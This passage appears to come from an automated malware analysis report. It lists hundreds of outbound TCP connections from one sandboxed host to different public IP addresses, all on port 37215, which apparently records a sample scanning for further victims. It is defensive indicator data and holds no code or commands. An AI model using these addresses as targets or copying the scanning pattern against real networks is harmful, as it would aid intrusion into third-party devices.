              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.131.199.209:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.219.250.136:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.216.51.106:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.67.145.154:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.202.80.254:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.54.128.3:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.21.61.171:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.99.121.168:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.144.25.125:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.253.169.41:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.82.96.117:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.75.82.188:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.163.135.204:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.6.121.111:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.104.76.213:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.110.159.240:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.24.215.156:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.3.229.12:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.27.105.43:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.245.20.67:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.142.195.246:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.253.67.136:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.213.160.144:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.122.215.134:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.3.18.34:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.72.183.239:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.61.110.96:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.86.151.162:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.13.17.220:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.66.28.33:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.166.70.107:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.181.126.150:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.216.15.82:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.234.4.130:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.101.99.59:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.190.151.207:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.130.152.218:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.96.96.151:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.240.251.125:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.202.179.221:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.207.183.119:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.166.206.210:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.166.175.43:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.180.82.153:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.247.161.96:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.118.106.6:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.211.177.28:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.142.112.211:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.124.88.229:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.75.81.67:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.161.127.231:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.130.237.20:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.156.171.83:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.55.124.150:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.92.153.4:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.2.185.212:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.54.87.13:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.65.234.216:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.232.179.79:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.162.49.42:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.205.240.40:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.172.76.196:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.128.112.156:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.29.92.170:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.0.123.239:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.203.159.27:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.190.103.161:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.194.57.152:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.60.173.65:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.142.123.20:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.110.229.200:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.68.151.116:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.116.149.196:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.168.12.246:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.96.242.195:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.25.11.221:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.100.45.218:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.141.52.88:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.199.121.250:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.252.197.105:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.17.94.216:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.255.151.110:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.190.229.130:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.213.203.22:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.63.88.122:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.204.147.251:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.18.255.115:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.187.92.119:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.111.134.58:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.129.18.138:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.79.214.41:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.62.245.228:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.166.96.248:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.116.108.81:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.251.68.106:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.85.192.71:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.137.48.248:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.207.63.59:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.147.28.54:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.155.44.208:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.136.33.21:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.64.89.146:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.116.150.51:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.251.224.114:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.127.43.147:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.161.102.152:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.123.117.169:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.92.76.88:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.94.40.6:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.47.229.82:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.40.147.181:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.242.69.8:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.101.105.75:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.1.193.69:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.182.157.193:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.19.114.220:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.210.107.88:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.198.17.230:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.195.12.128:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.50.110.206:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.211.42.17:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.91.191.24:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.209.25.83:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.105.157.88:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.249.19.196:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.185.196.147:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.223.206.240:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.110.95.85:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.158.30.201:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.60.234.50:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.146.112.89:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.218.26.198:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.198.127.87:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.166.102.65:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.152.17.130:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.222.74.13:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.14.210.40:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.214.237.51:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.40.187.16:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.55.234.242:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.94.216.123:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.18.210.93:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.205.94.33:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.141.201.44:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.159.132.1:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.187.82.224:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.84.188.215:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.168.52.155:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.234.207.77:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.44.242.48:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.219.114.59:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.112.53.75:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.190.106.24:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.232.154.146:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.200.167.57:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.115.7.142:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.191.231.92:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.218.8.206:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.54.33.43:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.29.248.21:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.60.157.35:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.98.238.156:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.34.222.234:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.101.247.168:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.80.204.89:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.109.53.120:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.236.61.193:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.97.53.222:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.74.238.46:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.64.14.218:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.17.102.157:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.21.26.13:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.86.28.94:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.76.130.236:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.209.70.86:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.124.128.109:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.183.188.230:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.44.212.144:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.191.104.205:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.43.57.29:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.135.240.152:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.198.186.162:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.16.25.53:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.218.52.83:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.191.50.142:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.25.150.73:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.0.92.68:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.58.215.137:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.21.102.239:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.64.151.113:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.113.85.0:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.80.117.241:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.119.50.144:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.178.34.254:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.237.204.239:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.4.213.184:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.189.206.93:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.192.144.24:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.78.253.8:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.128.135.111:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.117.66.121:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.126.184.115:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.251.2.145:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.92.91.237:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.13.159.90:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.188.139.210:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.146.25.235:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.53.111.32:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.117.227.153:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.120.153.177:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.93.99.202:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.23.27.69:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.176.108.54:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.181.230.243:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.143.227.177:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.209.33.48:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.127.196.56:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.36.216.172:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.128.151.190:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.126.1.250:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.49.110.51:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.39.35.13:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.11.178.202:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.130.91.11:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.135.60.218:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.208.152.146:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.34.106.105:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.113.155.208:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.36.199.243:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.196.73.163:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.195.43.44:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.254.121.89:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.117.176.89:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.12.148.44:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.147.4.47:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.143.22.57:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.39.160.188:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.215.115.136:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.22.98.147:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.227.63.185:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.24.42.128:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.180.114.154:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.212.126.34:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.12.70.68:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.246.205.22:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.219.181.15:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.99.58.133:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.60.179.152:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.122.186.138:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.219.164.190:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.188.100.114:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.74.50.88:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.243.237.31:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.112.138.216:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.236.187.71:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.73.117.88:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.120.137.168:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.188.133.34:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.105.14.208:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.59.78.44:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.161.27.62:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.186.201.201:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.105.94.87:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.205.31.27:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.35.85.145:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.214.10.229:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.26.212.255:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.162.247.102:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.94.251.92:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.208.147.31:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.195.19.156:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.202.228.18:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.96.55.66:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.233.238.202:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.103.228.225:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.241.211.201:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.81.97.165:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.107.74.221:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.215.252.5:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.226.206.169:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.201.218.162:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.48.180.180:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.233.84.30:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.149.31.119:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.245.240.44:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.229.189.209:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.255.251.124:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.58.89.85:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.60.246.230:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.202.156.239:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.135.207.20:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.167.192.235:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.179.243.35:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.245.202.19:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.184.138.37:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.247.1.64:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.184.137.28:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.0.201.170:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.6.219.145:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.239.52.248:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.30.227.247:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.118.254.170:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.177.183.164:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.150.10.90:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.3.64.105:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.77.120.230:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.147.4.214:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.50.121.172:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.143.183.218:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.98.229.77:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.238.25.91:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.136.140.71:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.190.35.155:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.149.88.30:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.175.65.82:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.227.246.137:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.25.211.158:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.173.112.60:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.202.163.48:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.197.112.232:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.72.109.71:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.53.2.54:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.53.255.45:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.0.70.22:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.127.128.23:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.98.193.55:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.221.237.201:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.54.223.206:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.130.100.18:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.159.214.11:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.111.29.88:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.47.104.83:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.48.190.144:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.79.196.204:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.218.215.166:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.216.120.53:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.251.237.139:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.222.59.90:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.118.0.211:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.119.47.114:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.7.132.134:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.199.220.146:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.227.195.119:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.26.123.130:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.116.23.23:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.93.198.185:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.52.194.180:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.249.94.155:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.138.180.52:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 197.211.153.87:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.185.199.91:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.229.126.200:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.42.71.8:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.8.10.155:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 102.86.114.222:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 156.250.178.73:37215
              Source: global trafficTCP traffic: 192.168.2.14:24027 -> 41.21.133.248:37215
